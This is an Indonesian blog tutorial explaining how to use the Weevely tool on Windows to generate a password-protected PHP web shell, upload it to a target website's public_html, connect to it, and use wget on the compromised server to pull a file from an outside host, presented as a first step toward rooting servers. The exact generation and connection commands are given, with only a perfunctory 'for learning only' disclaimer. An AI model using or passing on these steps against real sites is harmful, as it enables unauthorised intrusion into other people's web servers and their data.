Tutorial BackConnect Dengan Weevely | in Windows

Tutorial BackConnect Dengan Weevely | in Windows - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Tutorial BackConnect Dengan Weevely | in Windows, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Meskipun baru nyoba tadi, saya share aja deh. Sekalian biar tutornya kesimpen di blog. Biar enak kalo mau nyari-nyari lagi. Hehehehehe. Agak pusing nyari tutor Back Connect rata rata suruh pakai Netcat . Nah, apesnya, mungkin karena saya yang bego, ditunggu sampai satu jam gak mau connect ke server, padahal command-command yang saya jalankan sudah betul 🙁

Oke langsung s aja, gak usah basa-basi :p .

Bagi yang belum punya, download dulu bahan-bahannya :

Python

Python Read Line

Weevely


Install semua bahan diatas.

Untuk Weevely, saya ekstrak di direktori C:toolsweevely . Jadi nanti command commandnya ngikutin sendiri ya :p

Pertama , buka CMD, arahkan ke folder tempat sobat mengekstrak weevely tadi .

cd C:toolsweevely

Lalu kita coba membuat file php dengan perintah main.py -g -o namashell.php -p password

contoh : main.py -g -o akicha.php -p akicha

Tunggu sampai proses selesai. Lihat SS :











Step 1

Buka folder weevely, pasti ada file akicha.php, lalu upload ke web target. Di public_html saja biar gampang











Step 2

Langkah ke tiga, masukkan command berikut :

main.py -t -u http://target.com/akicha.php -p akicha

Tunggu sampai proses selesai 🙂




Sip, backconnect sukses.

Simpel kan ? 😀

Bagaimana kok saya tau kalo backconnect sukses ?

Saya test dengan menggunakan fingsi wget

wget http://newbieakicha.tk/x.txt




Hasilnya ?

http://sitotis.net/x.txt











wew, orang ganteng >.<

Sebenarnya tutorial ini adalah awalan saat kita ingin melakukan roting . Cuman karena saya belum bisa rooting, tutorial cukup sampai disini saja :p . Doakan supaya cepat bisa ngeroot server :3



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Tutorial BackConnect Dengan Weevely | in Windows.
Terima kasih telah membaca artikel Tutorial BackConnect Dengan Weevely | in Windows, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Tutorial BackConnect Dengan Weevely | in Windows"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel